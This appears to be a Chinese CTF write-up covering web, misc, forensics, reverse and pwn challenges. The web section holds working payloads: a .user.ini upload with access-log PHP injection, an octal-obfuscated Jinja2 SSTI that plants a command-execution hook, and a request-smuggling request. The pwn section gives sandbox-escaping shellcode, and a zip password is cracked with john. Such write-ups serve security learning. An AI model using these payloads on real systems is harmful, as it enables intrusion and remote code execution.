    _0x8bd32d[_0xf4e5c(_0x11e4ba._0x3d8cce, _0x11e4ba._0x135008, _0x11e4ba._0x1548b1, _0x11e4ba._0x1aa760)](confirm, _0xf4e5c(_0x11e4ba._0x229bf7, 0x23d, _0x11e4ba._0xe6db95, _0x11e4ba._0x3aa31e) + _0x2f5b69(0xcd, 0xb3, _0x11e4ba._0x3c19c3, _0x11e4ba._0x52b346) + _0xf4e5c(_0x11e4ba._0x48ed1f, _0x11e4ba._0x5d4762, _0x11e4ba._0x3c9e76, _0x11e4ba._0x2a9f09));
}
;

https://obf-io.deobfuscate.io/

访问/rqxvweqtyfshbs.php

奶龙牌图片处理器2.0

nginx直接上传.user.ini

POST / HTTP/1.1
Host: 175.27.251.122:33165
Upgrade-Insecure-Requests: 1
Origin: http://175.27.251.122:33165
Referer: http://175.27.251.122:33165/
Cookie: JSESSIONID=node0jmgnupaoej9r7mqglbiahyzu4.node0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjdcuXv5OADAN7I
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36;<?php phpinfo();?>
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 366

------WebKitFormBoundaryoIjdcuXv5OADAN7I
Content-Disposition: form-data; name="upload_file"; filename=".user.ini"
Content-Type: application/octet-stream

auto_append_file=/var/log/nginx/access.log
------WebKitFormBoundaryoIjdcuXv5OADAN7I--

重新开个靶机上传木马即可

Try2Crossover

from flask import Flask, render_template, request, redirect, url_for, render_template_string, abort

app = Flask(__name__)

    
books = [
    {"id": 1, "title": "the great gatsby", "author": "F. Scott Fitzgerald"},
    {"id": 2, "title": "to kill a lockingbird", "author": "Harper Lee"},
    {"id": 3, "title": "1984", "author": "George Orwell"}
]


def waf(code):
    blacklist = ["waf", "before", "after", "error", "teardown", "context", "appcontext",
                 ">", "<", "|", "stack", "top", "join", "count", "\\x", "original","request"]
    if any(pattern in code for pattern in blacklist):
        abort(403)
        
original_code = waf.__code__
original_name = waf.__name__

@app.route('/')
def index():
    return render_template('index.html', books=books)


@app.route('/add_book', methods=['POST'])
def add_book():
    title = request.form.get('title')
    author = request.form.get('author')
    waf(title)
    waf(author)

    book_id = len(books) + 1
    books.append({"id": book_id, "title": title, "author": author})

    return redirect(url_for('index'))


@app.route('/edit_book/<int:book_id>', methods=['GET', 'POST'])
def edit_book(book_id):
    book = next((b for b in books if b["id"] == book_id), None)

    if request.method == 'POST':
        book["title"] = request.form.get('title')
        book["author"] = request.form.get('author')
        waf(book['title'])
        waf(book['author'])

        return redirect(url_for('index'))

    return render_template('edit_book.html', book=book)


@app.route('/details/<int:id>', methods=['GET', 'POST'])
def details(id):
    book = next((b for b in books if b["id"] == id), None)
    book_author = book.get("author")
    waf(book_author)

    tem = """
<head>
    <title>Book Details</title>
</head>
<body>
    <h1>Book Details</h1>
    <p>ID: {{ book.id }}</p>
    <p>Title: {{ book.title|capitalize_title }}</p>
    <p>No other info.</p>
</body>
</html>"""
    render_template_string(book_author)
    if waf.__code__ != original_code or waf.__name__ != original_name:
        abort(403)
    return render_template_string(tem, book_author=book_author, book=book, )


@app.route('/forbidden',methods=['GET', 'POST'])
def forbidden():
    return "forbidden!!!"


@app.template_filter('capitalize_title')
def capitalize_title(title):
    return ' '.join(word.capitalize() for word in title.split())


@app.route("/admin", methods=['GET', 'POST'])
def admin():
    username = request.form.get('username')

    return f"Username: {username}\n"

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=5000)

本来不想动脑的，稍微看了一下好像八进制可以绕过，我之前蜀道山出的那道题目预期也是如此，现在只需要将payload优化即可

{{url_for["\137\137\147\154\157\142\141\154\163\137\137"]["\137\137\142\165\151\154\164\151\156\163\137\137"]["\145\166\141\154"]("\141\160\160.\141\146\164\145\162\137\162\145\161\165\145\163\164\137\146\165\156\143\163.\163\145\164\144\145\146\141\165\154\164(None, []).\141\160\160\145\156\144(lambda \162\145\163\160: \103\155\144\122\145\163\160 if \162\145\161\165\145\163\164.\141\162\147\163.\147\145\164('\143\155\144') and \145\170\145\143(\"\147\154\157\142\141\154 \103\155\144\122\145\163\160;\103\155\144\122\145\163\160=\137\137\151\155\160\157\162\164\137\137('\146\154\141\163\153').\155\141\153\145\137\162\145\163\160\157\156\163\145(\137\137\151\155\160\157\162\164\137\137('\157\163').\160\157\160\145\156(\162\145\161\165\145\163\164.\141\162\147\163.\147\145\164('\143\155\144')).\162\145\141\144())\")==None else \162\145\163\160)", {"\162\145\161\165\145\163\164":url_for["\137\137\147\154\157\142\141\154\163\137\137"]["\162\145\161\165\145\163\164"],"\141\160\160":url_for["\137\137\147\154\157\142\141\154\163\137\137"]["current_app"]})}}

from flask import Flask, request, render_template_string, abort

app = Flask(__name__)

blacklist = ["waf", "before", "after", "error", "teardown", "context", "appcontext",
                 ">", "<", "|", "stack", "top", "join", "count", "\\x", "original", "request"]


def waf_check(input_str):
    matched = []
    for pattern in blacklist:
        if pattern.lower() in input_str.lower():
            matched.append(pattern)
    return matched


@app.route('/')
def hello_world():
    name = request.args.get('name', 'bao')

    matches = waf_check(name)
    if matches:
        print(f"[WAF Blocked] 匹配到黑名单内容: {matches}")
        abort(403)

    template = f'<h1>Hi, {name}.</h1>'
    return render_template_string(template)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

本地测试了一下，肯定是绕过了的，但是远程不知道为什么没通，后面看到hint说有中间件作为反代，需要进行请求走私

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

网上给的是这种，那这题就是这样的

POST /admin HTTP/1.1
Host: 175.27.251.122:10001
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Sec-Websocket-Key1: x

usernamePOST /add_book HTTP/1.1
Host: 175.27.251.122:10001
Content-Length: 284
Content-Type: application/x-www-form-urlencoded
Connection: close

title=test&author={{get_flashed_messages["\137\137\147\154\157\142\141\154\163\137\137"]["\137\137\142\165\151\154\164\151\156\163\137\137"]['\137\137\151\155\160\157\162\164\137\137']('os').popen('sleep 5').read()}}

不知道为什么，用yakit做不了，把flag写到静态目录，

mkdir static;ls />static/3.txt
mkdir static;cat f*>static/3.txt

傻逼环境我测你妈

small_challenge

binwalk -e 1.png，有两个图，先双图合并试试

https://zxing.org/w/decode.jspx 解密，解密结果放到随波逐流里

UV!W_X_YZ,U,Y∈[0,9], V,W,X,Z∈[A,z]

直接掩码爆破

zip2john flag.zip >zip1.txt

john --mask='?d[A-Za-z]![A-Za-z]_[A-Za-z]_?d[A-Za-z]' zip1.txt --format=pkzip --fork=4

就是压缩包密码

数学天才

试炼一和试练二两个一起看解压葵花宝典

试炼一：斜下对角线的数字，是打开葵花宝典的密钥。
试炼二：为师不想要死，为师喜欢$。

经过分析得知

得到密码295$25$23，随波得到

synt{E3@1_Z@gu_t3avh5!}

# 有好几个有意义的挨着交
flag{R3@1_M@th_g3niu5!}

001

已知 6 位嫌疑人的手机号分别是：
135****2345
138****7383
153****9888
155****7991
157****0947
170****5678

找出和170****5678通话，微信图片_20250519152440.png和微信图片_20250519152452.png，其中全是该嫌疑人通话，

慢慢找，找出是flag{133****0181}

002

对135****2345开头的嫌疑人进行了部分排查，写个脚本进行处理

import pandas as pd
from collections import defaultdict
import sys


def find_common_contacts(target_numbers, call_records_df):
    """
    找出与所有给定电话号码都有过通话记录的电话号码
    
    参数:
        target_numbers (list): 需要查找的电话号码列表
        call_records_df (DataFrame): 包含通话记录的DataFrame
    
    返回:
        set: 与所有给定号码都有通话记录的电话号码集合
    """
    # 为每个目标电话号码创建联系人集合
    contacts = defaultdict(set)
    
    # 处理每一行通话记录
    for _, row in call_records_df.iterrows():
        caller = row['本机号码']
        receiver = row['对方号码']
        
        # 记录通话关系
        if caller in target_numbers:
            contacts[caller].add(receiver)
        if receiver in target_numbers:
            contacts[receiver].add(caller)
    
    # 检查是否所有目标号码都有联系人
    if len(contacts) < len(target_numbers):
        missing_numbers = set(target_numbers) - set(contacts.keys())
        print(f"警告: 以下号码在通话记录中未找到: {', '.join(missing_numbers)}")
    
    # 找出所有目标号码的联系人集合
    all_contacts = [contacts.get(num, set()) for num in target_numbers if num in contacts]
    
    # 找出所有集合的交集
    if not all_contacts:
        return set()
    
    common_contacts = set.intersection(*all_contacts)
    
    # 确保目标号码不包含在结果中
    return common_contacts - set(target_numbers)


def main():
    # 给定的电话号码列表
    target_numbers = [
        '135****2345',
        '138****7383',
        '153****9888',
        '155****7991',
        '157****0947',
        '170****5678'
    ]
    
    # 从Excel文件读取数据
    try:
        # 获取文件名（允许从命令行参数指定）
        file_name = sys.argv[1] if len(sys.argv) > 1 else '工作簿2.xlsx'
        sheet_name = sys.argv[2] if len(sys.argv) > 2 else 'Sheet1'
        
        print(f"正在从 {file_name} 的 {sheet_name} 表中读取数据...")
        
        # 读取Excel文件
        call_records_df = pd.read_excel(file_name, sheet_name=sheet_name)
        
        # 检查列名是否正确
        required_columns = ['本机号码', '对方号码']
        missing_columns = [col for col in required_columns if col not in call_records_df.columns]
        if missing_columns:
            print(f"错误：Excel文件中缺少以下列: {', '.join(missing_columns)}")
            return
        
        # 数据预处理
        print(f"原始数据包含 {len(call_records_df)} 条记录")
        
        # 确保号码格式一致（转为字符串）
        call_records_df['本机号码'] = call_records_df['本机号码'].astype(str)
        call_records_df['对方号码'] = call_records_df['对方号码'].astype(str)
        
        # 去除重复记录
        call_records_df = call_records_df.drop_duplicates(subset=['本机号码', '对方号码'])
        print(f"去重后包含 {len(call_records_df)} 条记录")
        
        # 调用函数查找共同联系人
        common_numbers = find_common_contacts(target_numbers, call_records_df)
        
        # 打印结果
        print(f"\n与所有给定电话号码都有通话记录的电话号码: {len(common_numbers)} 个")
        if common_numbers:
            for num in sorted(common_numbers):
                print(num)
        else:
            print("没有找到共同联系人")
        
        # 将结果保存到新的Excel文件
        output_file = '共同联系人结果.xlsx'
        result_df = pd.DataFrame({'共同联系人': list(common_numbers)})
        result_df.to_excel(output_file, index=False)
        print(f"\n结果已保存到 '{output_file}'")
        
    except FileNotFoundError:
        print(f"错误：找不到文件 '{file_name}'")
    except Exception as e:
        print(f"发生错误: {str(e)}")


if __name__ == "__main__":
    main()

得到flag{158****6074}

004

138****7383把这个号码的所有都提取出来，有448个，把时间锁定

类似的挨着找出来即可

flag{130****9357-137****5632-139****2928-183****5333}

qrd

flag格式为part1/part2，打开part1，发现是进行了某些加密，丢给gpt分析

梭哈解密脚本，得到第一段flag

# 已知的加密部分
encrypted = [88, 47, 80, 54, 95, 57, 90, 54, 94, 47]

# 对应的异或密钥（交替使用）
keys = [0x31, 0x58]

# 解密逻辑
decrypted = ''.join(chr(byte ^ keys[i % 2]) for i, byte in enumerate(encrypted))

# 输出结果
print("Decrypted flag:", decrypted)

# Decrypted flag: iwannaknow

第二段看图标可以知道是python打包的exe，常规反编译即可，用在线网站反编译后发现还需要一个decrypt函数

在pyz打包的目录中找到secret.pyc，反编译得到decrypt函数

丢给gpt写脚本即可：

def key_schedule(key: bytes) -> list:
    S = list(range(128))
    v6 = 0
    for j in range(128):
        v6 = (S[j] + key[j % len(key)] + v6) % 128
        v6 = (v6 ^ 55) % 128
        S[j], S[v6] = (S[v6], S[j])
    return S


def next_byte(state: dict) -> int:
    S = state['S']
    state['i'] = (state['i'] + 1) % 128
    state['j'] = (state['j'] + S[state['i']]) % 128
    S[state['i']], S[state['j']] = (S[state['j']], S[state['i']])
    v2 = S[(S[state['i']] + S[state['j']]) % 128]
    return (16 * v2 | v2 >> 4) & 255


def decrypt(ciphertext: bytes, key: bytes) -> bytes:
    state = {'S': key_schedule(key), 'i': 0, 'j': 0}
    plaintext = bytearray()
    for byte in ciphertext:
        plaintext.append(byte ^ next_byte(state))
    return bytes(plaintext)


# key 和 ciphertext 来自 WO0o.py
key = bytes.fromhex(
    'EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD')
ciphertext = b'\xd4z\'0L\x10\xca\x0b\x0b\xaa\x15\xbeK0"\xbf\xb2\xc6\x05'

# 解密得到 flag
flag = decrypt(ciphertext, key)
print(flag.decode())

# what_DO_you_mean#@!

拼接即为flag

小馋猫

题目开启沙箱

限制了一堆函数，但是可以使用open和sendfile函数

程序逻辑限制只能有一次syscall

并且清空了常见的寄存器，可以从xmm0寄存器中mov到rdi一个地址

恢复栈，然后调用一次open,之后布置好参数，jmp短跳转到上一次syscall,执行第二次sendfile的系统调用

from pwn import*
context(arch='amd64',log_level='debug')
# p=process("./pwn")

p=remote("175.27.229.115",7470)
p.recvuntil(":")


shellcode=asm('''              
movq rdi, xmm0
mov rsp,rdi 
mov rax, 2      
mov rdi, 0x67616c662f2e   
push rdi
mov rdi, rsp
nop
syscall
mov  rsi,rax  
mov rax,40  
mov rdi,1
mov r10,0x100
''')
p.sendline(b'a'*0x30+shellcode+b'\xeb\xe3')
p.interactive()